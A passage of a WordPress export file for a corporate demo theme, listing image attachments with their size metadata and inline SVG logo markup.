		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>549</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:26:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:26:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:686;s:4:"file";s:23:"2020/09/bg2-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg2-value-1-300x107.jpg";s:5:"width";i:300;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg2-value-1-1024x366.jpg";s:5:"width";i:1024;s:6:"height";i:366;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg2-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg2-value-1-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg2-value-1-1536x549.jpg";s:5:"width";i:1536;s:6:"height";i:549;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg2-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg2-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg2-value-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg2-value-1-1200x686.jpg";s:5:"width";i:1200;s:6:"height";i:686;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/bg3-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:53:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>558</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:53:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:53:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg3-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:23:"2020/09/bg3-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"bg3-value-1-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg3-value-1-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg3-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg3-value-1-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg3-value-1-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg3-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg3-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg3-value-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg3-value-1-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/pheader-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>567</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:25:"2020/09/pheader-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:24:"pheader-faq-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"pheader-faq-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"pheader-faq-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"pheader-faq-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"pheader-faq-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-faq-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"pheader-faq-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"pheader-faq-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"pheader-faq-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/bg1-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:41:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>571</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:41:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:41:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:250;s:4:"file";s:21:"2020/09/bg1-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-faq-1-300x39.jpg";s:5:"width";i:300;s:6:"height";i:39;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-faq-1-1024x133.jpg";s:5:"width";i:1024;s:6:"height";i:133;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-faq-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-faq-1-768x100.jpg";s:5:"width";i:768;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-faq-1-1536x200.jpg";s:5:"width";i:1536;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-faq-1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-faq-1-600x250.jpg";s:5:"width";i:600;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-faq-1-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-faq-1-1200x250.jpg";s:5:"width";i:1200;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/01-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>583</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/01-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 132.8 31.6" style="enable-background:new 0 0 132.8 31.6;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x31_">
	<g>
		<path class="st0" d="M36.1,14.4l0,10.1c0,0.5-0.3,0.9-0.7,1.2l-8.7,5c-0.4,0.2-0.9,0.2-1.4,0L19.1,27c0.9-0.3,1.6-1.2,1.6-2.2    v-2.3c0.1,0.1,4.8,2.9,4.8,2.9c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9l0-5.1c0-0.4-0.2-0.7-0.5-0.9l-4.4-2.8    c-0.3-0.2-0.7-0.2-1.1,0l-6.7,3.6c-0.3,0.2-0.7,0.2-1.1,0l-1.8-1h0l0-1.3c0-0.5,0.3-0.9,0.7-1.2l1.6-0.9l5.4-3.1l0.1-0.1l1.6-0.9    c0.4-0.2,0.9-0.2,1.4,0L28.2,9l0.1,0.1l7.1,4.1C35.8,13.4,36.1,13.9,36.1,14.4z"></path>
		<path class="st0" d="M28.3,8.2l-1.5-0.9c-0.4-0.2-0.9-0.2-1.4,0l-1.6,0.9l-0.1,0.1c-1-0.6-4.9-2.9-4.9-2.9c-0.3-0.2-0.7-0.2-1.1,0    l-4.4,2.5c-0.3,0.2-0.5,0.5-0.5,0.9v0.6l0,4.5c0,0.4,0.2,0.7,0.5,0.9l2.7,1.5l1.8,1c0.3,0.2,0.7,0.2,1.1,0l1.7-1l0,4.9    c-0.1,0-1.6,0.9-1.6,0.9c-0.4,0.2-0.9,0.5-1.4,0.3l-1.6-0.8l0,0l-7.1-4.1c-0.4-0.2-0.7-0.7-0.7-1.2l0-1.7l0-5.3l0-3.1    c0-0.5,0.3-0.9,0.7-1.2l8.7-5c0.4-0.2,0.9-0.2,1.4,0l8.7,5c0.4,0.2,0.7,0.7,0.7,1.2C28.3,7.1,28.3,7.5,28.3,8.2z"></path>
		<path class="st0" d="M20.1,22.2l0,2.8v0.3c0,0.5-0.3,0.9-0.7,1.2L18.4,27l-0.5,0.3l-7.1,4.1c-0.4,0.2-0.9,0.2-1.4,0l-8.7-5    C0.3,26.1,0,25.7,0,25.2v-0.3l0-9.8c0-0.5,0.3-0.9,0.7-1.2L7.6,10v5.2c0,0,0,0.1,0,0.1l-2.4,1.4c-0.3,0.2-0.5,0.5-0.5,0.9l0,4.8    v0.3c0,0.4,0.2,0.7,0.5,0.9l4.4,2.6c0.3,0.2,0.7,0.2,1.1,0l4.4-2.5c0.3-0.2,0.5-0.5,0.5-0.9v-0.6l0,0l0.2,0.1l1.4,0.8    c0.4,0.2,0.9,0.2,1.4,0l0,0l0,0c0.1,0,0.1,0,0.2-0.1L20.1,22.2z"></path>
	</g>
	<g>
		<path class="st0" d="M49.8,23.5c-0.9-0.3-1.6-0.6-2.1-1l0.9-2.1c0.5,0.4,1.1,0.7,1.8,0.9c0.7,0.2,1.4,0.3,2.1,0.3    c0.8,0,1.4-0.1,1.7-0.4c0.4-0.2,0.6-0.5,0.6-0.9c0-0.3-0.1-0.5-0.3-0.7c-0.2-0.2-0.5-0.3-0.9-0.5c-0.3-0.1-0.8-0.2-1.4-0.4    c-0.9-0.2-1.7-0.4-2.2-0.6c-0.6-0.2-1.1-0.6-1.5-1c-0.4-0.5-0.6-1.1-0.6-1.9c0-0.7,0.2-1.3,0.6-1.9c0.4-0.6,0.9-1,1.7-1.3    c0.8-0.3,1.7-0.5,2.8-0.5c0.8,0,1.5,0.1,2.2,0.3c0.7,0.2,1.4,0.4,1.9,0.8l-0.9,2.1c-1.1-0.6-2.2-0.9-3.3-0.9    c-0.8,0-1.3,0.1-1.7,0.4c-0.4,0.3-0.6,0.6-0.6,1s0.2,0.7,0.6,0.9c0.4,0.2,1.1,0.4,2,0.6c0.9,0.2,1.7,0.4,2.2,0.6    c0.6,0.2,1.1,0.6,1.5,1c0.4,0.5,0.6,1.1,0.6,1.9c0,0.7-0.2,1.3-0.6,1.9c-0.4,0.6-1,1-1.7,1.3c-0.8,0.3-1.7,0.5-2.8,0.5    C51.6,23.8,50.7,23.7,49.8,23.5z"></path>
		<path class="st0" d="M68.8,21.4v2.2h-9.3v-12h9v2.2h-6.3v2.6h5.6v2.2h-5.6v2.8H68.8z"></path>
		<path class="st0" d="M73.4,23c-1-0.5-1.8-1.3-2.3-2.2c-0.6-0.9-0.8-2-0.8-3.2c0-1.2,0.3-2.2,0.8-3.2c0.6-0.9,1.3-1.7,2.3-2.2    c1-0.5,2.1-0.8,3.4-0.8c1.2,0,2.4,0.3,3.3,0.8c1,0.5,1.8,1.3,2.3,2.2c0.6,0.9,0.9,2,0.9,3.2c0,1.2-0.3,2.2-0.9,3.2    c-0.6,0.9-1.4,1.7-2.3,2.2c-1,0.5-2.1,0.8-3.3,0.8C75.5,23.8,74.4,23.6,73.4,23z M78.7,21c0.6-0.3,1-0.8,1.3-1.4    c0.3-0.6,0.5-1.2,0.5-2c0-0.7-0.2-1.4-0.5-2c-0.3-0.6-0.8-1-1.3-1.4c-0.6-0.3-1.2-0.5-1.9-0.5c-0.7,0-1.3,0.2-1.9,0.5    c-0.6,0.3-1,0.8-1.3,1.4c-0.3,0.6-0.5,1.2-0.5,2c0,0.7,0.2,1.4,0.5,2c0.3,0.6,0.8,1,1.3,1.4c0.6,0.3,1.2,0.5,1.9,0.5    C77.5,21.5,78.1,21.3,78.7,21z"></path>
		<path class="st0" d="M101.1,23.6l0-7.2l-3.5,5.9h-1.2l-3.5-5.8v7h-2.6v-12h2.3l4.5,7.4l4.4-7.4h2.3l0,12H101.1z"></path>
		<path class="st0" d="M106.5,12.7c-0.3-0.3-0.5-0.6-0.5-1.1c0-0.4,0.2-0.8,0.5-1.1c0.3-0.3,0.7-0.4,1.2-0.4c0.5,0,0.9,0.1,1.2,0.4    s0.5,0.6,0.5,1c0,0.4-0.2,0.8-0.5,1.1c-0.3,0.3-0.7,0.4-1.2,0.4C107.2,13.2,106.8,13,106.5,12.7z M106.3,14.4h2.7v9.2h-2.7V14.4z"></path>
		<path class="st0" d="M119.8,15.3c0.7,0.7,1.1,1.7,1.1,3v5.3h-2.7v-4.9c0-0.7-0.2-1.3-0.5-1.6c-0.3-0.4-0.8-0.5-1.4-0.5    c-0.7,0-1.2,0.2-1.6,0.6c-0.4,0.4-0.6,1-0.6,1.9v4.5h-2.7v-9.2h2.5v1.1c0.4-0.4,0.8-0.7,1.3-0.9c0.5-0.2,1.1-0.3,1.7-0.3    C118.2,14.3,119.1,14.7,119.8,15.3z"></path>
		<path class="st0" d="M132.8,11v12.7h-2.5v-1.1c-0.7,0.8-1.6,1.2-2.9,1.2c-0.9,0-1.6-0.2-2.4-0.6c-0.7-0.4-1.3-0.9-1.6-1.7    c-0.4-0.7-0.6-1.5-0.6-2.5c0-0.9,0.2-1.8,0.6-2.5c0.4-0.7,0.9-1.3,1.6-1.7c0.7-0.4,1.5-0.6,2.4-0.6c1.2,0,2.1,0.4,2.8,1.1V11    H132.8z M129.5,20.9c0.4-0.5,0.7-1.1,0.7-1.9c0-0.8-0.2-1.4-0.7-1.9c-0.4-0.5-1-0.7-1.7-0.7c-0.7,0-1.2,0.2-1.7,0.7    c-0.4,0.5-0.7,1.1-0.7,1.9c0,0.8,0.2,1.4,0.7,1.9c0.4,0.5,1,0.7,1.7,0.7C128.5,21.6,129,21.4,129.5,20.9z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/faqs/02-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>584</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/02-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 131.6 29.8" style="enable-background:new 0 0 131.6 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x32_">
	<g>
		<path class="st0" d="M43.3,8.1h2.8v12.5h-2.8V8.1z"></path>
		<path class="st0" d="M53.1,20.7c-0.7,0-1.4,0-2-0.1s-1.4-0.1-2.1-0.3V8.3c0.6-0.1,1.2-0.2,1.9-0.2c0.7-0.1,1.3-0.1,1.9-0.1    c0.8,0,1.5,0.1,2.2,0.2c0.7,0.1,1.2,0.3,1.7,0.6c0.5,0.3,0.9,0.6,1.1,1.1c0.3,0.5,0.4,1,0.4,1.7c0,1-0.5,1.8-1.4,2.4    c0.8,0.3,1.3,0.7,1.6,1.2c0.3,0.5,0.4,1.1,0.4,1.7c0,1.3-0.5,2.3-1.4,3C56.4,20.4,55,20.7,53.1,20.7z M51.7,13h1.4    c0.9,0,1.5-0.1,1.9-0.3c0.4-0.2,0.6-0.6,0.6-1.1c0-0.5-0.2-0.9-0.6-1.1s-0.9-0.3-1.7-0.3c-0.2,0-0.5,0-0.8,0c-0.3,0-0.5,0-0.7,0    V13z M51.7,15.1v3.2c0.2,0,0.4,0,0.7,0.1c0.2,0,0.5,0,0.8,0c0.8,0,1.5-0.1,2-0.4s0.8-0.7,0.8-1.3c0-0.6-0.2-1-0.6-1.2    c-0.4-0.2-1-0.4-1.9-0.4H51.7z"></path>
		<path class="st0" d="M64.4,8.1c0.2,0.4,0.5,0.9,0.7,1.5c0.3,0.6,0.6,1.2,0.9,1.9c0.3,0.7,0.6,1.4,0.9,2.1s0.6,1.4,0.8,2    c0.3-0.6,0.5-1.3,0.8-2s0.6-1.4,0.9-2.1c0.3-0.7,0.6-1.3,0.9-1.9c0.3-0.6,0.5-1.1,0.7-1.5h2.6c0.1,0.8,0.2,1.8,0.3,2.8    c0.1,1,0.2,2.1,0.3,3.2c0.1,1.1,0.1,2.2,0.2,3.3c0.1,1.1,0.1,2.2,0.2,3.2H72c0-1.2-0.1-2.5-0.1-4c-0.1-1.4-0.2-2.9-0.3-4.3    c-0.2,0.5-0.5,1.1-0.7,1.7c-0.3,0.6-0.5,1.2-0.8,1.8c-0.3,0.6-0.5,1.2-0.7,1.8c-0.2,0.6-0.4,1-0.6,1.4h-2    c-0.2-0.4-0.4-0.9-0.6-1.4c-0.2-0.6-0.5-1.1-0.8-1.8c-0.3-0.6-0.5-1.2-0.8-1.8c-0.3-0.6-0.5-1.2-0.7-1.7c-0.1,1.5-0.2,2.9-0.3,4.3    c-0.1,1.4-0.1,2.7-0.1,4h-2.7c0-1,0.1-2,0.2-3.2c0.1-1.1,0.1-2.2,0.2-3.3c0.1-1.1,0.2-2.2,0.3-3.2c0.1-1,0.2-2,0.3-2.8H64.4z"></path>
